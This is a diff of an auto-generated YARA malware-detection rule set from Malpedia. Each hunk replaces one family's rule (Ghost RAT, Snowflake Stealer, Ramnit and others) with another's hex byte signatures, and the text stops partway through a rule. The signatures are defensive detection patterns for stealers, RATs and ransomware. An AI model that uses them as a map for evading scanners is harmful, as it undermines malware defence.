+		$sequence_12 = { 034228 8945c4 6a00 6a01 6800000010 }
+		$sequence_13 = { 034828 8b55fc 894a2c eb0a }
+		$sequence_14 = { 0345e8 2b45d4 8945dc e9???????? }
+		$sequence_15 = { 03420c 50 ff15???????? 8945f8 837df800 }
 
 	condition:
-		7 of them and filesize < 322560
+		7 of them and filesize < 4950016
 }
-rule MALPEDIA_Win_Kerrdown_Auto : FILE
+rule MALPEDIA_Win_Logtu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68770a3e-6717-5ac7-9970-7a5d2e8be7ee"
+		id = "94e45298-e780-5ad6-8cab-2da098818af3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kerrdown_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.logtu_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "5c1e70ce1c83c058010acdca1cced0163370ed7a63b1ae0a7c0e9df6e4e225f4"
+		logic_hash = "b14516261bf7c410bd1f687a208584a9b7a9e03096d2ecbcc28b896d23b0142d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125289,32 +125590,32 @@ rule MALPEDIA_Win_Kerrdown_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f83a2000000 c64405e800 40 83f804 }
-		$sequence_1 = { 64a300000000 8bf9 897ddc c745d800000000 }
-		$sequence_2 = { b8???????? 5f 5d c20800 85f6 75b2 }
-		$sequence_3 = { b9???????? 2bc2 50 68???????? e8???????? 5f 5d }
-		$sequence_4 = { 6800080000 8bf0 e8???????? 8bd8 83c408 }
-		$sequence_5 = { 897710 7202 8b0f c60100 b9???????? }
-		$sequence_6 = { 897ddc c745d800000000 33f6 c747140f000000 b8cd220000 837f1410 }
-		$sequence_7 = { b8???????? 8b15???????? 57 8b3d???????? 83ff10 0f43c1 3d???????? }
-		$sequence_8 = { a1???????? 33c4 8944241c 6807800000 ff15???????? }
-		$sequence_9 = { c745f800000000 83feff 7438 6a00 8d45f8 }
+		$sequence_0 = { 50 e8???????? 8d85fcf7ffff 6800040000 }
+		$sequence_1 = { 6a64 6a00 ff15???????? 85c0 7509 8b45bc }
+		$sequence_2 = { 8d8534ffffff 50 ff15???????? 6a01 8bf0 8d85a4fdffff 68???????? }
+		$sequence_3 = { 50 8d8574faffff 50 8d8534ffffff }
+		$sequence_4 = { 6a01 8bf0 8d85a4fdffff 68???????? 50 ff15???????? }
+		$sequence_5 = { 56 ff15???????? 56 ff15???????? 8b45f8 5e 8be5 }
+		$sequence_6 = { 50 8d8534ffffff 50 8d8514fcffff 50 }
+		$sequence_7 = { 50 e8???????? 8d85fcf7ffff 6800040000 50 }
+		$sequence_8 = { ff15???????? 56 ff15???????? 8b45f8 5e 8be5 }
+		$sequence_9 = { 50 ff15???????? 6a01 8bf0 8d85a4fdffff 68???????? 50 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 924672
 }
-rule MALPEDIA_Win_Donex_Auto : FILE
+rule MALPEDIA_Win_Kuaibu8_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8482aba2-5d7c-5acf-8ac0-6f701bcd4c3c"
+		id = "feff23df-fba9-50da-bdd6-d56c077ee020"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.donex_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kuaibu8_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "791a2daeadd431298c15aca6e723243f3ba034df68a0c21a097c95582d44c9bb"
+		logic_hash = "1c5187ee4041920ae10034915fbc8c0e2946de36b7825290c30788ee24d4d482"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125328,32 +125629,32 @@ rule MALPEDIA_Win_Donex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03c2 8b55f4 c1c008 03c2 8945ec 8b45fc 8bc8 }
-		$sequence_1 = { 2345f8 0375cc 0bc8 034dc4 03f7 8b45f4 8b7de8 }
-		$sequence_2 = { e8???????? 8b404c 83b8a800000000 7512 8b04bd08a44300 807c302900 7504 }
-		$sequence_3 = { 40 50 8d8598fcffff 50 e8???????? eb09 ff750c }
-		$sequence_4 = { 2345ec 0bc1 c145f40a 034598 8b4dd8 03c2 }
-		$sequence_5 = { c1c00e 8bce 03c2 f7d1 234dec 81c2e9766d7a }
-		$sequence_6 = { 897df0 3b7dfc 0f826cffffff ff75e8 ff15???????? ff75ec e8???????? }
-		$sequence_7 = { 8bca c1c906 33f9 8b4df4 33cb 23ca 334df4 }
-		$sequence_8 = { 56 57 56 c706ffffffff e8???????? 83c40c 8945fc }
-		$sequence_9 = { 83c408 85db 7529 57 ff7508 e8???????? 8bd8 }
+		$sequence_0 = { e8???????? 83c404 58 8be5 5d c26400 55 }
+		$sequence_1 = { 0f84b2000000 6804000080 6a00 68???????? 6801000000 bb98010000 e8???????? }
+		$sequence_2 = { 7409 53 e8???????? 83c404 8b45c4 e9???????? 6802000080 }
+		$sequence_3 = { c745e400000000 b8???????? 8945e0 8d45e0 50 e8???????? 8945dc }
+		$sequence_4 = { 7d0d 56 e8???????? 33c0 5e 83c410 c3 }
+		$sequence_5 = { 5e 81c410010000 c3 8d442410 50 56 }
+		$sequence_6 = { 68???????? ff75d4 68???????? ff75f4 68???????? b905000000 e8???????? }
+		$sequence_7 = { 83c40c 8945e8 6802000080 6a00 6800000000 6a00 }
+		$sequence_8 = { ff75f4 68???????? 6800000000 6800000000 ff15???????? 90 90 }
+		$sequence_9 = { 8b5dec e8???????? 33c9 50 8d45f4 8bd8 58 }
 
 	condition:
-		7 of them and filesize < 505856
+		7 of them and filesize < 737280
 }
-rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE
+rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bc09d07d-0ef6-59f5-8fc9-74662cfa791b"
+		id = "ff7e3b17-5233-56c0-8cf9-b500183b9183"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snowflake_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.trochilus_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "9c9e75fd4eed4eb18eb308bb8329401876776f47e6918bf3c298e3ce6d294888"
+		logic_hash = "28ef93658f73bc964eedcf05592130cfb5b477accac6e59366138836c637cdc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125366,33 +125667,33 @@ rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
-	strings:
-		$sequence_0 = { ff7320 8d2c39 896c241c e8???????? 83c40c 89442414 85c0 }
-		$sequence_1 = { f3a5 8d74243c 89c7 0fb70c24 66894844 66895046 89f1 }
-		$sequence_2 = { e9???????? 8b0d???????? 898424d8000000 89842434010000 8d0532db5b00 899424dc000000 89942438010000 }
-		$sequence_3 = { f20f114808 f20f1100 83c010 8906 ff4608 83c410 5e }
-		$sequence_4 = { ffb42480000000 6a38 ff742448 55 e8???????? 8b5c2434 8d4524 }
-		$sequence_5 = { ff750c ff30 ff15???????? c9 c3 53 56 }
-		$sequence_6 = { eb11 89c1 ba05010000 68???????? e8???????? 58 0f0b }
-		$sequence_7 = { ff4608 ba???????? 89f1 6a03 e8???????? 59 89c2 }
-		$sequence_8 = { f20f1144242c e8???????? f20f5805???????? f20f104c242c 51 51 f20f5ec8 }
-		$sequence_9 = { ff4f3c 837e0801 7509 396e0c 7504 834f1cff 3906 }
+	strings:
+		$sequence_0 = { bb00010000 e8???????? 85c0 7452 8bf0 eb2d 8b4d08 }
+		$sequence_1 = { 0f84e0000000 399d2cffffff 0f84d4000000 57 56 68???????? 53 }
+		$sequence_2 = { 8b01 8d55fc 52 ff7510 ff750c ff5030 6a00 }
+		$sequence_3 = { 8975e0 8db1f8190110 8975e4 eb2b 8a4601 84c0 7429 }
+		$sequence_4 = { e8???????? 89442410 85c0 0f849e000000 8bf8 8d4728 }
+		$sequence_5 = { e8???????? c70009000000 e8???????? ebd5 8bc8 c1f905 8b0c8d409a8100 }
+		$sequence_6 = { 57 ff15???????? 33c0 5f 5d c20400 55 }
+		$sequence_7 = { 85c0 7414 53 ff15???????? 8b4dfc 8bc6 e8???????? }
+		$sequence_8 = { 83630400 832300 8b4508 894308 8b450c }
+		$sequence_9 = { 8d8534ffffff 50 8d8d7cffffff e8???????? 397df0 764d 837df408 }
 
 	condition:
-		7 of them and filesize < 6196224
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Chches_Auto : FILE
+rule MALPEDIA_Win_Taidoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d15a52b4-77ce-52c4-a76e-32aad2b4034d"
+		id = "ba437ab9-6c90-576a-83d2-5801ebb87e42"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chches_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.taidoor_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "826aac443fa892955ee21ee159179cf79234b9fe8bb8add3f0a9151151666203"
+		logic_hash = "7b8ed6f15654e580fefed39d2d4fea0473e69a1fd6a98339a075f2fbcf4be749"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125406,34 +125707,34 @@ rule MALPEDIA_Win_Chches_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83fbff 0f84a6000000 8b4d14 8bc7 23c1 83f8ff 7506 }
-		$sequence_1 = { 89441104 8b550c 8b4a04 8b5668 53 51 50 }
-		$sequence_2 = { 747a 8b16 8b4244 8b4010 85c0 7454 3903 }
-		$sequence_3 = { 8b543bfc 8b4218 51 8b4e68 50 ffd1 }
-		$sequence_4 = { 8b07 895810 8b0f 83c114 3bcb 0f8481000000 8b5508 }
-		$sequence_5 = { 81c71d051101 53 897de0 c745fc00000000 e8???????? 83c404 8945c4 }
-		$sequence_6 = { 3b08 7516 ff8fcc000000 8b5644 50 6a00 ffd2 }
-		$sequence_7 = { c6857bffffff3a c6857cffffff2a c6857dffffff50 c6857effffffca c6857fffffffe9 c64580ab c64581ec }
-		$sequence_8 = { ffd0 8b0b c1e104 8907 03c1 0f849d000000 8b550c }
-		$sequence_9 = { 8b45bc 8b7de8 83c408 c745fc01000000 8b9680000000 50 ffd2 }
+		$sequence_0 = { 7433 ff750c 889c05f4fbffff 50 8d85f4fbffff 6a01 50 }
+		$sequence_1 = { 395d10 7e1b 56 8b450c }
+		$sequence_2 = { 897df0 50 56 e8???????? 8b3d???????? 83f86f 750c }
+		$sequence_3 = { 83a00401000000 b001 c9 c20800 8b8104010000 }
+		$sequence_4 = { 7e24 8a0406 fec0 3c3a 8845ec }
+		$sequence_5 = { 57 a0???????? c745fc01000000 8ac8 f6d9 1bc9 33db }
+		$sequence_6 = { b940420f00 f7f9 8d45e0 52 ff35???????? ff35???????? }
+		$sequence_7 = { e9???????? 8d4de0 e8???????? 8d8588f7ffff 50 ff35???????? ffd6 }
+		$sequence_8 = { ff75ec 8d4df0 e8???????? 8b450c 46 3b70f8 7cdc }
+		$sequence_9 = { 53 50 53 c7458844000000 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Ghost_Rat_Auto : FILE
+rule MALPEDIA_Win_Kurton_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e442a566-13fc-5122-ba83-74fd22421a05"
+		id = "ae340b25-d60e-5936-9704-4ef115d92a62"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghost_rat_auto.yar#L1-L316"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kurton_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ec6224b8ae12982eada904cedab10d4c1635a00f1f82b5bceec6389113a6ffb4"
+		logic_hash = "98f093531c4285f2e18a4965e5bde7f8dfb22eacc63485687a98c0565a239fa8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125445,55 +125746,32 @@ rule MALPEDIA_Win_Ghost_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 56 ff15???????? 5e c20800 }
-		$sequence_1 = { 8bd9 e8???????? 8b4d08 3bc8 }
-		$sequence_2 = { 8b400c 85c0 7505 a1???????? 50 8bce }
-		$sequence_3 = { 6a6b 8bce e8???????? 5f }
-		$sequence_4 = { 5d c20400 894df4 c745f800000000 df6df4 }
-		$sequence_5 = { df6df4 83ec08 dc0d???????? dd1c24 ff15???????? }
-		$sequence_6 = { e9???????? 8d45dc 50 681f000200 }
-		$sequence_7 = { ffd3 8bd8 85db 750d 5f 5e 5d }
-		$sequence_8 = { 83c454 c20400 8d7901 57 ff15???????? 8bcf 8bd8 }
-		$sequence_9 = { 68???????? 68???????? 6a00 6a00 c705????????20010000 e8???????? 8b35???????? }
-		$sequence_10 = { 8365fc00 ff7508 ff15???????? 40 50 ff15???????? 59 }
-		$sequence_11 = { ff7510 ff75dc ff15???????? 85c0 7507 c745e401000000 }
-		$sequence_12 = { 50 8d442434 894c2438 50 6a00 c744243c01000000 }
-		$sequence_13 = { 8dbd85feffff f3ab 66ab aa }
-		$sequence_14 = { 8d85c0feffff 50 57 ff15???????? 8bf8 }
-		$sequence_15 = { ff15???????? 8b4e04 e8???????? 33c0 5e }
-		$sequence_16 = { 6a00 ff7628 ff15???????? 6a01 ff7620 ff15???????? 8b4e04 }
-		$sequence_17 = { ffb6a8000000 ff15???????? ffb6ac000000 ff15???????? }
-		$sequence_18 = { 6a00 50 e8???????? 83c40c ff7508 6a40 ff15???????? }
-		$sequence_19 = { 56 ff15???????? 6a71 8bcf e8???????? 5f 5e }
-		$sequence_20 = { 5f 5e 5b 83c454 c20400 }
-		$sequence_21 = { c744242400000000 c644241c05 885c241d c644241e00 885c241f }
-		$sequence_22 = { 68???????? 50 6802000080 e8???????? 83c41c 5f 5e }
-		$sequence_23 = { 8bfe f2ae f7d1 49 7509 5f }
-		$sequence_24 = { 6a00 6838040000 6a00 6a00 }
-		$sequence_25 = { 8b7e20 8b36 813f6b006500 7406 813f4b004500 }
-		$sequence_26 = { 83e9fc c70161727941 83e9fc c70100000000 }
-		$sequence_27 = { c7014c6f6164 83e9fc c7014c696272 83e9fc }
-		$sequence_28 = { 89855cffffff 8b8d5cffffff 66c7014242 8b955cffffff 8b423c 8945ec }
-		$sequence_29 = { 8945e4 8b4ddc 81c1f8000000 894dd8 8b55e4 8b4220 }
-		$sequence_30 = { 83c002 8945f0 eb9e 8b4df0 894dfc e9???????? 8be5 }
-		$sequence_31 = { 8945ec 8b45ec 8b08 034df8 8b55ec 890a 8b45f0 }
-		$sequence_32 = { 898570ffffff e8???????? 6a40 6800100000 8b45d0 }
+		$sequence_0 = { 33d2 f7750c ebe7 55 8bec 53 56 }
+		$sequence_1 = { 51 ffd6 8b3d???????? 8d542428 52 ffd7 }
+		$sequence_2 = { 8bc6 83e61f c1f805 59 8b0485a05b0210 8d0cf6 8064880400 }
+		$sequence_3 = { 6a03 8d542418 68???????? 52 50 e8???????? 8b8c2438010000 }
+		$sequence_4 = { 53 52 53 53 6a16 50 }
+		$sequence_5 = { 52 53 68???????? 50 c745bcf4010000 ff15???????? }
+		$sequence_6 = { 6a00 6a00 51 e8???????? 83c410 c20400 }
+		$sequence_7 = { 8079ff00 0f8547ffffff 8bc6 8088e15d021008 40 3dff000000 72f1 }
+		$sequence_8 = { ff15???????? 85f6 7434 8d4e08 51 ff15???????? 85c0 }
+		$sequence_9 = { f7d1 2bf9 8d94245d010000 8bc1 8bf7 8bfa c1e902 }
 
 	condition:
-		7 of them and filesize < 357376
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Badflick_Auto : FILE
+rule MALPEDIA_Win_Xiangoop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d5d1b93f-b8ef-5919-881c-41cd371c0e33"
+		id = "6e84a1ce-b3cc-5c7d-80b5-2c2f7136b8d8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badflick_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiangoop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xiangoop_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "254e8105548798f084c01ec737c733ae7316a19998160441541107c24531856e"
+		logic_hash = "3a1a5f28cac0124e198da0edd11ac88ef86aa9a350a33831b6bb7ce30756bca1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125507,32 +125785,32 @@ rule MALPEDIA_Win_Badflick_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff35???????? 8d85ecfbffff ff35???????? 68???????? ff35???????? 68???????? 68???????? }
-		$sequence_1 = { ff15???????? 85c0 0f8425010000 837dfc04 0f851b010000 }
-		$sequence_2 = { a5 a5 a5 e8???????? 33db 59 885d0b }
-		$sequence_3 = { ff15???????? 8bd8 83fbff 746b 56 }
-		$sequence_4 = { e9???????? 33db 395df8 74e2 6800800000 }
-		$sequence_5 = { 8bf0 68???????? 56 ff15???????? 85c0 0f85e7000000 6a01 }
-		$sequence_6 = { 56 ff15???????? 50 0fb706 50 }
-		$sequence_7 = { 8d85a8fbffff 50 7408 e8???????? }
-		$sequence_8 = { ff7508 ff15???????? 53 ff15???????? 5f }
-		$sequence_9 = { ff15???????? 32c0 eb3e ff7510 e8???????? 8bf0 }
+		$sequence_0 = { 8b45f4 0fb60c08 81e1ff000000 0bd1 b804000000 }
+		$sequence_1 = { 8945ec 837dec00 750e 8b55f8 83c214 8955f8 }
+		$sequence_2 = { 81e2ff000000 8b45f8 c1e808 8b75f8 }
+		$sequence_3 = { 8b55f0 83c204 8955f0 8b45fc 8b4df0 8b11 8910 }
+		$sequence_4 = { 891408 b904000000 6bd103 b804000000 6bc806 8b45fc }
+		$sequence_5 = { 8955f8 837df800 7741 7206 837df40a 7339 8b4d08 }
+		$sequence_6 = { 8b55fc 330c02 894dec e9???????? 8b45dc }
+		$sequence_7 = { c745e408430110 e9???????? 894de0 c745e408430110 e9???????? c745e404430110 e9???????? }
+		$sequence_8 = { 6bc203 8b5510 884c020c 8be5 }
+		$sequence_9 = { 0bc1 ba01000000 d1e2 8b4df4 0fb6541110 81e2ff000000 c1e208 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 246784
 }
-rule MALPEDIA_Win_Bohmini_Auto : FILE
+rule MALPEDIA_Win_Orangeade_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c8923e09-0cd1-5865-924f-18639308d13e"
+		id = "a790e493-320f-57de-9b62-d13796c94676"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bohmini_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.orangeade_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "d63dab417a618811791980b051ba5149b8c4dca6bd7568c5aa5894be2ba1d4b9"
+		logic_hash = "bc9cfd6680cc4f32cd41e9edf43afa43b54975c598906df96ea95e31fa6c1612"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125546,32 +125824,32 @@ rule MALPEDIA_Win_Bohmini_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 751e 8b4610 85c0 7403 50 ffd3 }
-		$sequence_1 = { 6a01 ffd5 5f 5e 5d 5b }
-		$sequence_2 = { 57 ff15???????? 8b742414 57 56 e8???????? 83c408 }
-		$sequence_3 = { 3db7000000 7504 895c240c 8b15???????? }
-		$sequence_4 = { ff15???????? 83f801 7562 8d4c2418 51 e8???????? }
-		$sequence_5 = { 8b4c2404 85c0 7408 8bc8 8b00 }
-		$sequence_6 = { 50 6819000200 66a5 8d4c2420 55 bf04010000 51 }
-		$sequence_7 = { 688b130000 ff15???????? 8b7c2410 e9???????? 53 56 55 }
-		$sequence_8 = { 6a00 50 8b84244c010000 50 e8???????? }
-		$sequence_9 = { 8b8c2458020000 8d54244c 51 52 e8???????? 83c408 }
+		$sequence_0 = { 8bb42428050000 50 8bce e8???????? c744241001000000 }
+		$sequence_1 = { 50 8d942470020000 51 52 ff15???????? }
+		$sequence_2 = { f3ab 66ab aa 8d842468020000 50 }
+		$sequence_3 = { 6881000000 6a00 c784249428010000000000 ff15???????? 8bf0 56 }
+		$sequence_4 = { aa b93f000000 33c0 8dbc2465010000 }
+		$sequence_5 = { 8d4c2424 c684248828010002 e8???????? 8d4c2410 c684248828010001 e8???????? 8d4c2414 }
+		$sequence_6 = { b93f000000 33c0 8d7c2479 885c2478 f3ab }
+		$sequence_7 = { 68???????? 8d4c2410 e8???????? 68???????? 6884000000 53 ff15???????? }
+		$sequence_8 = { e8???????? 83c404 8d4c2424 c684248828010002 }
+		$sequence_9 = { 50 8d4c2410 c684248400000001 e8???????? }
 
 	condition:
 		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Ehdevel_Auto : FILE
+rule MALPEDIA_Win_Equationdrug_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7db917ef-bc83-5744-b6c0-6eb0a0f20aea"
+		id = "3c043b62-e6cf-528c-b34b-4fab7307ccc3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ehdevel_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.equationdrug_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "9b05c9bc40d7442213206fba6f4d684a37ffe66d5cd633b4545ba4a54fb64f27"
+		logic_hash = "bfe71e1dede0b483002d6bdc1803bedc3b70169ecaeef47717be14607c4ca6a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125585,34 +125863,34 @@ rule MALPEDIA_Win_Ehdevel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744240c00040000 89742418 ff15???????? 68???????? e8???????? 83c404 5e }
-		$sequence_1 = { 52 8b95ece7ffff 50 51 52 c685f3e7ffff00 e8???????? }
-		$sequence_2 = { 6a00 6800000040 8d85f4efffff 50 ff15???????? 8bf0 }
-		$sequence_3 = { 33cc e8???????? 8be5 5d c3 8d442410 68???????? }
-		$sequence_4 = { 898dc48bffff e8???????? 83c408 8985e88bffff }
-		$sequence_5 = { 668955d4 e8???????? 8bce c745fc0a000000 e8???????? c745fcffffffff }
-		$sequence_6 = { 8b95ece7ffff 83c404 52 e8???????? 8b85ece7ffff 83c404 }
-		$sequence_7 = { 6800008000 6a00 6a00 6a00 8d8df88bffff 51 }
-		$sequence_8 = { 8b4df8 83c404 5f 33cd b001 }
-		$sequence_9 = { 7514 68???????? 6800040000 8d842408080000 50 eb28 68???????? }
+		$sequence_0 = { 8b4c241c 81e6ffff0000 8b11 ff5214 8b4c2418 668bd0 8b442414 }
+		$sequence_1 = { 8911 8bd4 894104 66896908 8bcf 8b01 8902 }
+		$sequence_2 = { 89742418 3bc2 0f8731020000 6683ff01 0f8227020000 668b44246a 663dffff }
+		$sequence_3 = { c21400 8b17 6a02 8bcf ff523c 85c0 750c }
+		$sequence_4 = { 56 57 8bbc248c000000 57 55 50 }
+		$sequence_5 = { 6a44 e8???????? 83c404 89442464 3bc3 c644245c02 740b }
+		$sequence_6 = { eb02 33c0 50 8bcb c7442424ffffffff e8???????? }
+		$sequence_7 = { 83c424 c21000 8b4c2414 85c9 7406 8b01 6a01 }
+		$sequence_8 = { 8bf0 c68424cc00000001 e8???????? 8d8c2484000000 889c24cc000000 e8???????? 8d4c240c }
+		$sequence_9 = { ff502c 85c0 750d 5f b800090000 5e 83c410 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 449536
 }
-rule MALPEDIA_Win_Ransomlock_Auto : FILE
+rule MALPEDIA_Win_Ramnit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42563703-564f-5a14-8829-64d9a4cd308b"
+		id = "2d07274e-4e7e-51f1-9043-6e669a2900ab"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ransomlock_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ramnit_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "9226a9c11140386a0aeef708faad6314d93055d8b25dc4f728e9575057eabf60"
+		logic_hash = "ac5af9c4c79d490a7e08824dfdc4e94d8423d8a8e8b47eb3783c3aa2be0c55ae"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125624,32 +125902,32 @@ rule MALPEDIA_Win_Ransomlock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c414 8dbdb0fdffff 32c0 b908020000 f3aa 8b3d???????? }
-		$sequence_1 = { ffd2 8b45e8 50 ff15???????? 5f 5e 5b }
-		$sequence_2 = { 85f6 0f84d1000000 6a01 53 6a03 53 53 }
-		$sequence_3 = { c20400 55 8bec 8b4508 ff4850 }
-		$sequence_4 = { 8b45fc 83c704 ff4dec 75c4 8b08 8b5108 50 }
-		$sequence_5 = { ffd0 85c0 7822 8b45fc 3bc6 741b 8b08 }
-		$sequence_6 = { a1???????? 8945fc 85c0 7450 817d0c10020000 }
-		$sequence_7 = { 8bf0 85f6 7512 8d95d4fdffff 52 57 }
-		$sequence_8 = { 8b45f0 3bc6 0f8418010000 8b08 8d55fc }
-		$sequence_9 = { 5d c22400 b801000000 5d c22400 }
+		$sequence_0 = { 5a 5b c9 c20400 55 8bec }
+		$sequence_1 = { 5e 5f 59 5a }
+		$sequence_2 = { 51 52 8b4508 8b5d0c 4b f7d3 23c3 }
+		$sequence_3 = { 51 52 8b4508 8b5d0c }
+		$sequence_4 = { 8b7510 3b7514 7705 3b7d0c 7602 }
